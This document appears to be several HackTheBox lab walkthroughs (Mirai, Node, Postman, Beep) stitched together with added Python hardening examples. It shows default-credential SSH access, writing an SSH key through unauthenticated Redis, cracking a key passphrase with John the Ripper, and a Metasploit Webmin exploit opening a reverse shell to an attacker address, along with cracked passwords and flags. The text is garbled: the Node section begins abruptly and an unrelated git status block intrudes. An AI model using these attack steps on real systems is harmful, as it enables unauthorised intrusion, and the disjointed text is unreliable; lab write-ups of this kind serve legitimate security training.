Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box Mirai.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.48 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 09:35 EEST
Nmap scan report for 10.10.10.48
Host is up (0.033s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1050/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.07 seconds
We found an admin console in 10.10.10.48/admin/.
The name of the service is Pi-hole.
The default credentials for the Pi-hole host are pi:raspberry.
We can use them for the SSH login.
root@kali:~# sshpass -p raspberry ssh pi@10.10.10.48
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 10 06:49:57 2020 from 10.10.14.32
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
pi@raspberrypi:~ $
Now we have the user pi. user.txt is in the directory /home/pi/Desktop.
Using sudo -l, we can find out that we can run any command with root privileges.
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
Switch to root and go to /root.
There is a root.txt, but it says the flag is not here.
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Using df -h, we can find out that /dev/sdb is mounted on /media/usbstick.
Then go to /media/usbstick.
There is an interesting file, damnit.txt.
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
It sounds like root.txt has already been deleted.
However, deleting a file only unlinks it; its data blocks are not wiped, so we can still find the flag by running strings on the raw device.
root@raspberrypi:~# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
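The recovery step above relies on nothing more than scanning a block device for printable runs. The following is an added example, not code from the original walkthrough: a minimal strings(1)-style scanner in Python that streams a device or image file in chunks and then filters for runs shaped like a 32-character hex digest. The sample image, the hex string in it and the scan_device/find_hex_digests names are all constructed for this illustration.

```python
import re

# Minimal strings(1)-style scanner. GNU strings treats a byte as part of a
# string when it is printable ASCII (0x20..0x7e) or a tab; anything else,
# including newlines and NUL bytes, ends the current run.
def is_graphic(byte: int) -> bool:
    return 0x20 <= byte < 0x7F or byte == 0x09


def iter_strings(chunks, min_len: int = 4):
    """Yield every run of at least min_len graphic bytes found across chunks.

    The current run is carried over chunk boundaries, so a whole block device
    can be streamed through this without loading it into memory.
    """
    run = bytearray()
    for chunk in chunks:
        for byte in chunk:
            if is_graphic(byte):
                run.append(byte)
                continue
            if len(run) >= min_len:
                yield run.decode("ascii")
            run.clear()
    if len(run) >= min_len:
        yield run.decode("ascii")


def extract_strings(data: bytes, min_len: int = 4):
    """Convenience wrapper for in-memory data."""
    return list(iter_strings([data], min_len))


def scan_device(path: str, min_len: int = 4, chunk_size: int = 1 << 20):
    """Stream a raw device or image file (e.g. /dev/sdb) in chunk_size pieces."""
    def chunks():
        with open(path, "rb") as fh:
            while True:
                chunk = fh.read(chunk_size)
                if not chunk:
                    return
                yield chunk
    return list(iter_strings(chunks(), min_len))


def find_hex_digests(found, length: int = 32):
    """Keep only runs shaped like a lowercase hex digest of the given length."""
    pattern = re.compile(r"^[0-9a-f]{%d}$" % length)
    return [s for s in found if pattern.match(s)]


# Constructed sample image standing in for /dev/sdb: directory entry names,
# some binary noise, the data block of the unlinked root.txt (a constructed
# hex string, not the real flag) and the note left behind on the stick.
SAMPLE_IMAGE = (
    b"\x00" * 32
    + b"/media/usbstick\x00lost+found\x00root.txt\x00damnit.txt\x00"
    + b"\x8b\x12\xfe\x00\x01\x02"
    + b"0123456789abcdef0123456789abcdef\n"
    + b"\x00" * 16
    + b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
    + b"Do you know if there is any way to get them back?\n-James\n"
    + b"\x03\x04\x05"
)

if __name__ == "__main__":
    import sys
    # Pass a device or image path to scan it; with no argument the constructed sample is used.
    found = scan_device(sys.argv[1]) if len(sys.argv) > 1 else extract_strings(SAMPLE_IMAGE)
    for s in found:
        print(s)
    print("digest-shaped strings:", find_hex_digests(found))
```

The same scan over a real image shows why a plain rm is not enough when a device leaves your control: only an overwrite of the data blocks (or full-disk encryption from the start) removes the content that strings can still read back.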
root@kali:~# ssh mark@10.10.10.58
mark@10.10.10.58's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
.-.
.-'``(|||)
,`\ \ `-`. 88 88
/ \ '``-. ` 88 88
.-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
(:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
`-` ` , : 88 88 88 88 88 88 88 88 88 88 88
\ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
`./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'`-..-()`-`
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark)
However, we still cannot get user.txt.
There are two other users.
mark@node:/home$ ls -l
total 12
drwxr-xr-x 2 root root 4096 Aug 31 2017 frank
drwxr-xr-x 3 root root 4096 Sep 3 2017 mark
drwxr-xr-x 6 root root 4096 Sep 3 2017 tom
If we take a look at the processes, we can see two processes run by another user, "tom".
mark@node:~$ ps aux | grep tom
tom 1211 0.0 5.8 1074616 44232 ? Ssl 19:31 0:03 /usr/bin/node /var/scheduler/app.js
tom 1231 0.0 6.6 1024156 50068 ? Ssl 19:31 0:04 /usr/bin/node /var/www/myplace/app.js
mark 1610 0.0 0.1 14228 1020 pts/0 S+ 23:05 0:00 grep --color=auto tom
Using the following command, we can access the MongoDB command-line interface.
It is also possible to insert a reverse shell command there.
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
After a few minutes, we can get a reverse shell as user “tom”.
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN)[10.10.10.58] 38860
bash: cannot set terminal process group (1230): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$ id
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
user.txt is in the directory “/home/tom”.
tom@node:/$ cd /home/tom
cd /home/tom
tom@node:~$ ls
ls
user.txt
tom@node:~$ cat user.txt
cat user.txt
e1156acc3574e04b06908ecf76be91b1
3. Getting Root
With the following command, we can find a binary file “/usr/local/bin/backup”
$ git status
On branch Github-LFS
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
modified: public/images/2017-09-21/gcc-1.png
modified: public/images/2017-09-21/gcc-2.png
modified: public/images/2017-09-21/gcc-3.png
modified: public/images/2018-12-01/2018-12-05-09-49-17.png
modified: public/images/2018-12-01/2018-12-05-09-50-24.png
---
Then, commit and push the branch.
We see some diagnostic information about .png file upload.
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Postman”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.160 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-14 18:54 EET
Nmap scan report for 10.10.10.160
Host is up (0.043s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html;Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.81 seconds
1n4r1@kali:~$ redis-cli -h 10.10.10.160
10.10.10.160:6379> info
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-58-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:616
run_id:521dd2981efd190099f6fdc8744a20a1b3217664
tcp_port:6379
uptime_in_seconds:444
uptime_in_days:0
hz:10
lru_clock:7323466
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
---
10.10.10.160:6379> keys *
(empty list or set)
10.10.10.160:6379> config get *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "cluster-announce-ip"
8) ""
9) "unixsocket"
---
2. Summary
Port 22: OpenSSH running
Port 80: HTTP website running with Apache
Port 6379: Redis 4.0.9 running (anonymous access allowed)
Port 10000: Webmin httpd running
3. Getting User
Since we have unauthenticated access to Redis, we can use it to enumerate the file system in the following way.
As you can see, if we set dir to a directory that does not exist, Redis answers "No such file or directory", so the error message tells us whether a path exists.
10.10.10.160:6379> config get dir
1)"dir"
2)"/var/lib/redis"
10.10.10.160:6379> config set dir /var/lib/redis/non-exist-directory
(error) ERR Changing directory: No such file or directory
This time the command succeeds, which tells us there is an .ssh directory in the home directory of the redis user.
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379>
root@kali:~# cat pubkey.txt | redis-cli -h 10.10.10.160 -x set pubkey
OK
After that, save the key into the “/var/lib/redis/.ssh/authorized_keys”.
root@kali:~# redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379>
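Everything in this step works because the CONFIG GET output earlier showed requirepass empty and the server was reachable from the VPN. The following added example (not part of the walkthrough or of Redis itself) parses a redis.conf and reports the settings that make the dir/dbfilename/SAVE write possible, with a constructed weak configuration beside a hardened one. Both configuration fragments and the audit_redis_conf/parse_redis_conf names are constructed for this illustration; the directive names themselves (bind, protected-mode, requirepass, rename-command) are real Redis directives.

```python
import shlex

# Constructed redis.conf fragments (not the box's real configuration). The weak
# one reproduces what the CONFIG GET output on this box implies: no password,
# reachable from the network, CONFIG left enabled.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE-WITH-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
dbfilename dump.rdb
"""

ALL_INTERFACES = {"0.0.0.0", "*", "::"}


def parse_redis_conf(text: str):
    """Return (directives, renamed): directives maps a lower-cased directive
    name to its argument list, renamed maps a command name to its new name
    (an empty string means the command is disabled)."""
    directives, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles the quoted "" in rename-command
        name, args = parts[0].lower(), parts[1:]
        if name == "rename-command" and len(args) == 2:
            renamed[args[0].upper()] = args[1]
        else:
            directives[name] = args
    return directives, renamed


def audit_redis_conf(text: str):
    """List the settings that let an unauthenticated client change dir and
    dbfilename and then write a file with SAVE."""
    directives, renamed = parse_redis_conf(text)
    findings = []
    binds = directives.get("bind", [])
    # Redis listens on every interface when bind is absent, so treat that as exposed.
    if not binds or ALL_INTERFACES & set(binds):
        findings.append("bind: listening on all interfaces")
    if directives.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    password = directives.get("requirepass", [""])
    if not (password and password[0]):
        findings.append("requirepass: not set, unauthenticated clients are accepted")
    if renamed.get("CONFIG") != "":
        findings.append('CONFIG: not disabled (rename-command CONFIG "")')
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or ["no findings"])
```

The bind check is deliberately conservative: with protected-mode enabled, an unbound, password-less instance only accepts loopback clients, but the audit still flags it because one later edit to protected-mode would expose it. Disabling CONFIG via rename-command is what removes the file-write primitive even if a client does authenticate.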
Now we can SSH into the server as the user redis.
However, user.txt is not in the home directory of the redis user.
root@kali:~# ssh redis@10.10.10.160
The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.160' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)
redis@Postman:~$
With some enumeration, we can find an interesting file “id_rsa.bak” in the “/opt” directory.
On Kali Linux, John the Ripper can brute-force the passphrase of an SSH private key.
First, however, we need to convert the private key into a hash format that John the Ripper can crack, using ssh2john.py.
Cracking it with "rockyou.txt" yields the passphrase "computer2008", though we do not yet know whose key it is.
root@kali:~# /usr/share/john/ssh2john.py id_rsa.bak > hash.txt
root@kali:~# john hash.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa.bak)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:06 DONE (2020-03-15 10:55) 0.1468g/s 2105Kp/s 2105Kc/s 2105KC/sa6_123..*7¡Vamos!
Session completed
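John's "Cost 1 ... is 1" line above says this key used the legacy MD5/3DES PEM encryption, which is why a wordlist ran through it in seconds. The following added example (not from the walkthrough, and not John's or OpenSSH's code) inspects a private key file and reports whether it is passphrase-protected and which KDF stretches the passphrase, reading only the PEM headers or the openssh-key-v1 header fields. The LEGACY_PEM sample, the build_openssh_v1_header helper and the inspect_private_key/rate_key names are constructed for this illustration; the file formats themselves are the real ones.

```python
import base64
import struct

# Constructed sample: a traditional PEM private key encrypted with the legacy
# OpenSSL scheme (key derived from the passphrase by a single MD5 pass, 3DES
# cipher). The base64 body is dummy data; only the headers are inspected.
LEGACY_PEM = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,0123456789ABCDEF

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(value: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(value)) + value


def _read_string(blob: bytes, offset: int):
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start = offset + 4
    return blob[start:start + length], start + length


def build_openssh_v1_header(cipher: bytes, kdf: bytes, rounds: int = 16) -> str:
    """Constructed helper: emit an openssh-key-v1 file containing only the header
    fields (ciphername, kdfname, kdfoptions, nkeys), which is all the inspector reads."""
    kdfoptions = b"" if kdf == b"none" else _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfoptions) + struct.pack(">I", 1))
    body = base64.b64encode(blob).decode("ascii")
    lines = [body[i:i + 70] for i in range(0, len(body), 70)]
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + "\n".join(lines) + "\n-----END OPENSSH PRIVATE KEY-----\n"


def inspect_private_key(text: str) -> dict:
    """Report whether a private key file is passphrase-protected and how the
    passphrase is stretched, without needing the passphrase itself."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, off = _read_string(blob, len(magic))
        kdf, off = _read_string(blob, off)
        kdfoptions, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            _salt, pos = _read_string(kdfoptions, 0)
            (rounds,) = struct.unpack(">I", kdfoptions[pos:pos + 4])
        return {"format": "openssh-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    # Traditional PEM: encryption is signalled by RFC 1421 style headers.
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip()] = value.strip()
    encrypted = headers.get("Proc-Type") == "4,ENCRYPTED"
    cipher = headers["DEK-Info"].split(",")[0] if encrypted else "none"
    return {"format": "pem", "encrypted": encrypted, "cipher": cipher,
            "kdf": "md5" if encrypted else "none", "rounds": 1 if encrypted else None}


def rate_key(info: dict) -> str:
    if not info["encrypted"]:
        return "unprotected: the key file alone is enough to log in"
    if info["kdf"] == "md5":
        return "weak: one MD5 pass per guess, so an offline wordlist attack is cheap"
    if info["kdf"] == "bcrypt" and info["rounds"] < 16:
        return "moderate: bcrypt KDF but fewer rounds than ssh-keygen's default of 16"
    return "good: bcrypt KDF with %s rounds" % info["rounds"]
```

Keys in the legacy format are converted by re-saving them with ssh-keygen -p -o (and -a to raise the round count), which is the fix for the finding this example reports; a backup such as id_rsa.bak in a world-readable location defeats even that, so the audit is best paired with a check of where key files live.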
Besides redis, only one user, "Matt", is allowed to log in.
This time we cannot SSH in as Matt, but we can use su to become the user "Matt".
One service we have not looked at yet is the Webmin httpd.
For the privilege escalation we can reuse Matt's credential.
Trying it against Webmin confirms that the same credential is accepted for authentication.
Matt:computer2008
We can also search for vulnerabilities in Webmin 1.910 with searchsploit.
For Webmin 1.910 there is one entry, "Webmin 1.910 - 'Package Updates' Remote Command Execution".
Using the username and password from above, we can get a root shell.
With the common python pty trick, we can then upgrade it to a fully interactive shell.
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set password computer2008
password => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160
rhosts => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.14.9
lhost => 10.10.14.9
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce)> run
[*] Started reverse TCP handler on 10.10.14.9:4444
[+] Session cookie: 28319cb492d25d1493cbd8a83f732ca8
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.9:4444 -> 10.10.10.160:49658) at 2020-03-16 18:56:54 +0200
id
uid=0(root) gid=0(root) groups=0(root)
python -c "import pty;pty.spawn('/bin/bash')"
root@Postman:/usr/share/webmin/package-updates/#
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Beep”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.7 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 09:55 EET
Nmap scan report for 10.10.10.7
Host is up (0.044s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE UIDL STLS EXPIRE(NEVER) APOP TOP IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING RESP-CODES USER LOGIN-DELAY(0)
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ATOMIC LITERAL+ CATENATE ANNOTATEMORE OK CHILDREN IDLE X-NETSCAPE MULTIAPPEND UIDPLUS ID MAILBOX-REFERRALS IMAP4rev1 NAMESPACE LIST-SUBSCRIBED LISTEXT URLAUTHA0001 CONDSTORE UNSELECT Completed SORT=MODSEQ THREAD=ORDEREDSUBJECT THREAD=REFERENCES BINARY SORT RIGHTS=kxte NO STARTTLS RENAME QUOTA IMAP4 ACL
443/tcp open ssl/https?
|_ssl-date: 2020-03-01T09:01:11+00:00; +1h02m01s from scanner time.
880/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 1h02m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 382.63 seconds
root@kali:~#
Gobuster HTTP:
root@kali:~# gobuster dir -u http://10.10.10.7/ -x php -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.7/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/03/01 10:04:30 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.7/23b3f8d9-6290-4f1e-85a5-9a8041a56e20 => 302. To force processing of Wildcard responses, specify the '--wildcard' switch
root@kali:~#
If we grep for the word "password", we find an interesting parameter.
Now we have the following password.
jEhdIekWmdjE
This time, we can use this password to connect over SSH.
As always, "root.txt" is in the directory "/root".
root@kali:~# ssh root@10.10.10.7
root@10.10.10.7's password:
Last login: Sun Mar 1 19:45:39 2020 from 10.10.14.27
Welcome to Elastix
----------------------------------------------------
To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7
[root@beep ~]# cat /root/root.txt
d88e006123842106982acce0aaf453f0
[root@beep ~]#